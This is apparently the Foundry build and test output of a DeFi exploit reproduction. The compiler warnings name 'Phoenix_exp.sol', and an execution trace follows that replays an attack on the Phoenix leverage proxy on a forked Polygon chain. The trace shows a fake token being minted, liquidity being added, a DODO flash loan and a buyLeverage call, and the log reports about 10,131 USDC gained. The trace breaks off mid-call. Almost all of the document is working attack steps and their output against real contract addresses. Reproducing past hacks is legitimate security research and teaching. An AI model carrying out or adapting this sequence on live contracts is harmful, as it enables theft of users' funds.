Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.36s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-03/Phoenix_exp.sol:24:5:
   |
24 |     IERC20 USDC = IERC20(0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:3064:1:
     |
3064 | interface USDC {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-03/Phoenix_exp.sol:25:5:
   |
25 |     IERC20 WETH = IERC20(0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-03/Phoenix_exp.sol:57:31:
   |
57 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-03/Phoenix_exp.sol:57:47:
   |
57 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-03/Phoenix_exp.sol:57:67:
   |
57 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-03/Phoenix_exp.sol:57:88:
   |
57 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 696.47ms (2.19ms CPU time)

Ran 1 test for src/test/2023-03/Phoenix_exp.sol:ContractTest
[PASS] testExploit() (gas: 4375575)
Logs:
  Attacker USDC balance after exploit: 10131.590116

Traces:
  [20123] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("polygon", 40066946 [4.006e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(USDC: [0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174], "USDC")
    │   └─ ← [Return]
    ├─ [0] VM::label(WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], "phxProxy")
    │   └─ ← [Return]
    ├─ [0] VM::label(Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], "Router")
    │   └─ ← [Return]
    ├─ [0] VM::label(dodo: [0x1093ceD81987Bf532c2b7907B2A8525cd0C17295], "dodo")
    │   └─ ← [Return]
    └─ ← [Stop]

  [4610475] ContractTest::testExploit()
    ├─ [2608] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::record()
    │   └─ ← [Return]
    ├─ [608] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::accesses(WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619])
    │   └─ ← [Return] [0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03], []
    ├─ [0] VM::load(WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ emit WARNING_UninitedSlot(who: WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], slot: 43395567998282996429510105732813622026225105309595388710023329053794126379779 [4.339e76])
    ├─ [0] VM::load(WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [608] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ [0] VM::store(WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff)
    │   └─ ← [Return]
    ├─ [608] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]
    ├─ [0] VM::store(WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, 0x0000000000000000000000000000000000000000000000000000000000000000)
    │   └─ ← [Return]
    ├─ emit SlotFound(who: WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], fsig: 0x70a08231, keysHash: 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, slot: 43395567998282996429510105732813622026225105309595388710023329053794126379779 [4.339e76])
    ├─ [0] VM::load(WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03) [staticcall]
    │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    ├─ [0] VM::store(WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03, 0x0000000000000000000000000000000000000000000000000018de76816d8000)
    │   └─ ← [Return]
    ├─ [608] WETH::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 7000000000000000 [7e15]
    ├─ [736596] → new SHITCOIN@0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f
    │   ├─  storage changes:
    │   │   @ 5: 0 → 18
    │   │   @ 4: 0 → 0x5348495400000000000000000000000000000000000000000000000000000008
    │   │   @ 3: 0 → 0x5348495420434f494e0000000000000000000000000000000000000000000012
    │   └─ ← [Return] 3341 bytes of code
    ├─ [47129] SHITCOIN::mint(1500000000000000000000000 [1.5e24])
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1500000000000000000000000 [1.5e24])
    │   ├─  storage changes:
    │   │   @ 0: 0 → 0x000000000000000000000000000000000000000000013da329b6336471800000
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000013da329b6336471800000
    │   └─ ← [Stop]
    ├─ [25078] SHITCOIN::approve(Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x5a81487ee36dd29474ce7e17974478ea93a8e0120266ad4e0bc09406b69cec2c: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24768] WETH::approve(Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x9a328ce9dd74780f134ac00bed7c0f1f4f68fcc80339507d08bb9234c103911d: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [2701780] Router::addLiquidity(SHITCOIN: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], 7000000000000000 [7e15], 7000000000000000 [7e15], 0, 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1678185390 [1.678e9])
    │   ├─ [2564] 0x5757371414417b8C6CAad45bAeF941aBc7d3Ab32::getPair(SHITCOIN: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619]) [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   ├─ [2483204] 0x5757371414417b8C6CAad45bAeF941aBc7d3Ab32::createPair(SHITCOIN: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619])
    │   │   ├─ [2327803] → new <unknown>@0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 5: 0 → 0x0000000000000000000000005757371414417b8c6caad45baef941abc7d3ab32
    │   │   │   │   @ 3: 0 → 0xd0d216fd5d552786f2fd58f1a78ffdeedee6c0af00e7ef6ebd1246f2f405fbbe
    │   │   │   │   @ 12: 0 → 1
    │   │   │   └─ ← [Return] 11293 bytes of code
    │   │   ├─ [44677] 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b::initialize(SHITCOIN: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 7: 0 → 0x0000000000000000000000007ceb23fd6bc0add59e62ac25578270cff1b9f619
    │   │   │   │   @ 6: 0 → 0x0000000000000000000000005615deb798bb3e4dfa0139dfa1b3d433cc23b72f
    │   │   │   └─ ← [Stop]
    │   │   ├─ emit PairCreated(token0: SHITCOIN: [0x5615dEB798BB3E4dFa0139dFa1b3D433Cc23b72f], token1: WETH: [0x7ceB23fD6bC0adD59E62ac25578270cFf1b9f619], pair: 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b, : 43128 [4.312e4])
    │   │   ├─  storage changes:
    │   │   │   @ 7: 0 → 0x0000000000000000000000007ceb23fd6bc0add59e62ac25578270cff1b9f619
    │   │   │   @ 0xf83db241669d9a52c6edf737420d30a0244dfdf452c48b4efc62a1e702ee0af7: 0 → 0x00000000000000000000000024e271e485d5f7a331fc61c3a6d6c6253d3a584b
    │   │   │   @ 0x7f5c2c8155ebb08fcab937d1f5784431ce676aca692311104dc5d4c5b84f0ec5: 0 → 0x00000000000000000000000024e271e485d5f7a331fc61c3a6d6c6253d3a584b
    │   │   │   @ 0xc2575a0e9e593c00f959f8c92f12db2869c3395a3b0502d05e2516446f72a0d2: 0 → 0x00000000000000000000000024e271e485d5f7a331fc61c3a6d6c6253d3a584b
    │   │   │   @ 3: 43127 → 43128
    │   │   └─ ← [Return] 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b
    │   ├─ [2504] 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b::getReserves() [staticcall]
    │   │   └─ ← [Return] 0, 0, 0
    │   ├─ [26533] SHITCOIN::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b, 7000000000000000 [7e15])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b, value: 7000000000000000 [7e15])
    │   │   ├─  storage changes:
    │   │   │   @ 0x6bca66f416481ad289c673d7ed77c205052948a365bacc055bf4d86d20c16b48: 0 → 0x0000000000000000000000000000000000000000000000000018de76816d8000
    │   │   │   @ 0x5a81487ee36dd29474ce7e17974478ea93a8e0120266ad4e0bc09406b69cec2c: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffe721897e927fff
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000013da329b6336471800000 → 0x000000000000000000000000000000000000000000013da3299d54edf0128000
    │   │   └─ ← [Return] true
    │   ├─ [28349] WETH::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b, 7000000000000000 [7e15])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b, value: 7000000000000000 [7e15])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], value: 115792089237316195423570985008687907853269984665640564039457577007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x9a328ce9dd74780f134ac00bed7c0f1f4f68fcc80339507d08bb9234c103911d: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffe721897e927fff
    │   │   │   @ 0x0cd3a2dc7d1f0c4ada18d59da33fded3c01d2190b51dc6214aad3b189545db8c: 0 → 0x0000000000000000000000000000000000000000000000000018de76816d8000
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x0000000000000000000000000000000000000000000000000018de76816d8000 → 0
    │   │   └─ ← [Return] true
    │   ├─ [149982] 0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b::mint(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─ [824] SHITCOIN::balanceOf(0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b) [staticcall]
    │   │   │   └─ ← [Return] 7000000000000000 [7e15]
    │   │   ├─ [608] WETH::balanceOf(0x24e271e485d5f7A331FC61c3a6d6C6253d3A584b) [staticcall]
    │   │   │   └─ ← [Return] 7000000000000000 [7e15]
    │   │   ├─ [2314] 0x5757371414417b8C6CAad45bAeF941aBc7d3Ab32::feeTo() [staticcall]
    │   │   │   └─ ← [Return] 0x7B5D42d0363008CE90C2c8a7A94cE5B9B398426f
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0000000000000000000000000000000000000000, value: 1000)
    │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 6999999999999000 [6.999e15])
    │   │   ├─ emit Sync(reserve0: 7000000000000000 [7e15], reserve1: 7000000000000000 [7e15])
    │   │   ├─ emit Mint(sender: Router: [0xa5E0829CaCEd8fFDD4De3c43696c57F7D7A678ff], amount0: 7000000000000000 [7e15], amount1: 7000000000000000 [7e15])
    │   │   ├─  storage changes:
    │   │   │   @ 8: 0 → 0x640713ae0000000000000018de76816d80000000000000000018de76816d8000
    │   │   │   @ 0: 0 → 0x0000000000000000000000000000000000000000000000000018de76816d8000
    │   │   │   @ 11: 0 → 0x000000000000000000000000000000000000026a778a03dd7c6189d640000000
    │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x0000000000000000000000000000000000000000000000000018de76816d7c18
    │   │   │   @ 0xa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb49: 0 → 1000
    │   │   └─ ← [Return] 6999999999999000 [6.999e15]
    │   └─ ← [Return] 7000000000000000 [7e15], 7000000000000000 [7e15], 6999999999999000 [6.999e15]
    ├─ [721225] dodo::flashLoan(0, 8000000000 [8e9], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [718526] 0x206A7590626c2e84E3e2FFF1F51efe02Cd0DCea9::flashLoan(0, 8000000000 [8e9], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00) [delegatecall]
    │   │   ├─ [41944] USDC::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 8000000000 [8e9])
    │   │   │   ├─ [36773] 0xDD9185DB084f5C4fFf3b4f70E7bA62123b812226::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 8000000000 [8e9]) [delegatecall]
    │   │   │   │   ├─ emit Transfer(from: dodo: [0x1093ceD81987Bf532c2b7907B2A8525cd0C17295], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 8000000000 [8e9])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x8974174c7f2e07c44ab2f2c73be7a9272455f23eb1885f7cfe3d0b7763ab92c9: 0x000000000000000000000000000000000000000000000000000000136387a215 → 0x0000000000000000000000000000000000000000000000000000001186b15215
    │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000000000000000001dcd65000
    │   │   │   │   └─ ← [Return] true
    │   │   │   └─ ← [Return] true
    │   │   ├─ [646214] ContractTest::DPPFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 8000000000 [8e9], 0x00)
    │   │   │   ├─ [28002] USDC::approve(phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   ├─ [27330] 0xDD9185DB084f5C4fFf3b4f70E7bA62123b812226::approve(phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x853e913a5faa9c25b589268edc473da98668d0ca49ae1c63032bb0cd322d1fcd: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [414185] phxProxy::buyLeverage(8000000000 [8e9], 0, 1678185390 [1.678e9], 0x)
    │   │   │   │   ├─ [408970] 0x6d68bEB09ea7e76d561EA8C4Aac34A6611dd9821::buyLeverage(8000000000 [8e9], 0, 1678185390 [1.678e9], 0x) [delegatecall]
    │   │   │   │   │   ├─ [49856] 0x0a6293a64D4C2EaaB8e349FA6A9F4D238d46b491::getPrices([225900680333960219407938996974195039816770929012 [2.259e47], 713158665868485082376537274511917747815375828505 [7.131e47]]) [staticcall]
    │   │   │   │   │   │   ├─ [15643] 0xfE4A8cc5b5B2366C1B58Bea3858e81843581b2F7::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   ├─ [7410] 0xf9c53A834F60cBbE40E27702276fBc0819B3aFAD::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 4439996 [4.439e6], 100000000 [1e8], 1678185386 [1.678e9], 1678185386 [1.678e9], 4439996 [4.439e6]
    │   │   │   │   │   │   │   └─ ← [Return] 36893488147423543228 [3.689e19], 100000000 [1e8], 1678185386 [1.678e9], 1678185386 [1.678e9], 36893488147423543228 [3.689e19]
    │   │   │   │   │   │   ├─ [15643] 0xF9680D99D6C9589e2a93a78A04A279e509205945::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   ├─ [7410] 0x4dD6655Ad5ed7C06c882f496E3f42acE5766cb89::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 4500536 [4.5e6], 156761000000 [1.567e11], 1678185390 [1.678e9], 1678185390 [1.678e9], 4500536 [4.5e6]
    │   │   │   │   │   │   │   └─ ← [Return] 36893488147423603768 [3.689e19], 156761000000 [1.567e11], 1678185390 [1.678e9], 1678185390 [1.678e9], 36893488147423603768 [3.689e19]
    │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000056bc75e2d63100000000000000000000000000000000000000000000000000000000000247faf0840
    │   │   │   │   │   ├─ [29709] USDC::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 8000000000 [8e9])
    │   │   │   │   │   │   ├─ [29031] 0xDD9185DB084f5C4fFf3b4f70E7bA62123b812226::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 8000000000 [8e9]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], value: 8000000000 [8e9])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], value: 115792089237316195423570985008687907853269984665640564039457584007905129639935 [1.157e77])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x853e913a5faa9c25b589268edc473da98668d0ca49ae1c63032bb0cd322d1fcd: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffe2329afff
    │   │   │   │   │   │   │   │   @ 0x8de46fa0eb5b86b1323c66704d3dfcb9d9e3cc12893f0629b22ca85fd90aaa9d: 0 → 0x00000000000000000000000000000000000000000000000000000001dcd65000
    │   │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000000000000000001dcd65000 → 0
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [11544] USDC::transfer(0xfa5678fCA5484d31f65854C496126a605066D4bF, 8000000 [8e6])
    │   │   │   │   │   │   ├─ [10873] 0xDD9185DB084f5C4fFf3b4f70E7bA62123b812226::transfer(0xfa5678fCA5484d31f65854C496126a605066D4bF, 8000000 [8e6]) [delegatecall]
    │   │   │   │   │   │   │   ├─ emit Transfer(from: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], to: 0xfa5678fCA5484d31f65854C496126a605066D4bF, value: 8000000 [8e6])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x8de46fa0eb5b86b1323c66704d3dfcb9d9e3cc12893f0629b22ca85fd90aaa9d: 0x00000000000000000000000000000000000000000000000000000001dcd65000 → 0x00000000000000000000000000000000000000000000000000000001dc5c3e00
    │   │   │   │   │   │   │   │   @ 0x66ea8bc9e2ef35f01ea6670ecf02bf5ea8ac61dd4ecdfe8ce8b62e3189023be1: 0x000000000000000000000000000000000000000000000000000000000abe8d22 → 0x000000000000000000000000000000000000000000000000000000000b389f22
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ emit Redeem(param0: 0xfa5678fCA5484d31f65854C496126a605066D4bF, param1: USDC: [0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174], param2: 8000000 [8e6])
    │   │   │   │   │   ├─ [56799] 0xd0289082cf4c5c2ba448B4B9c67232729aa75EfA::borrow(10241303053 [1.024e10])
    │   │   │   │   │   │   ├─ [51605] 0x1021024d6Dc53BCb929eA0e6A664194809C9464a::borrow(10241303053 [1.024e10]) [delegatecall]
    │   │   │   │   │   │   │   ├─ [11544] USDC::transfer(phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 10236182401 [1.023e10])
    │   │   │   │   │   │   │   │   ├─ [10873] 0xDD9185DB084f5C4fFf3b4f70E7bA62123b812226::transfer(phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], 10236182401 [1.023e10]) [delegatecall]
    │   │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0xd0289082cf4c5c2ba448B4B9c67232729aa75EfA, to: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], value: 10236182401 [1.023e10])
    │   │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   │   @ 0x7cc43a538d7333cf34e05b568fc782cddbd26a060b20502344096cec505ce974: 0x00000000000000000000000000000000000000000000000000000017f7100921 → 0x0000000000000000000000000000000000000000000000000000001594f049a0
    │   │   │   │   │   │   │   │   │   │   @ 0x8de46fa0eb5b86b1323c66704d3dfcb9d9e3cc12893f0629b22ca85fd90aaa9d: 0x00000000000000000000000000000000000000000000000000000001dc5c3e00 → 0x000000000000000000000000000000000000000000000000000000043e7bfd81
    │   │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ emit Redeem(param0: phxProxy: [0x65BaF1DC6fA0C7E459A36E2E310836B396D1B1de], param1: USDC: [0x2791Bca1f2de4661ED88A30C99A7a9449Aa84174], param2: 10236182401 [1.023e10])
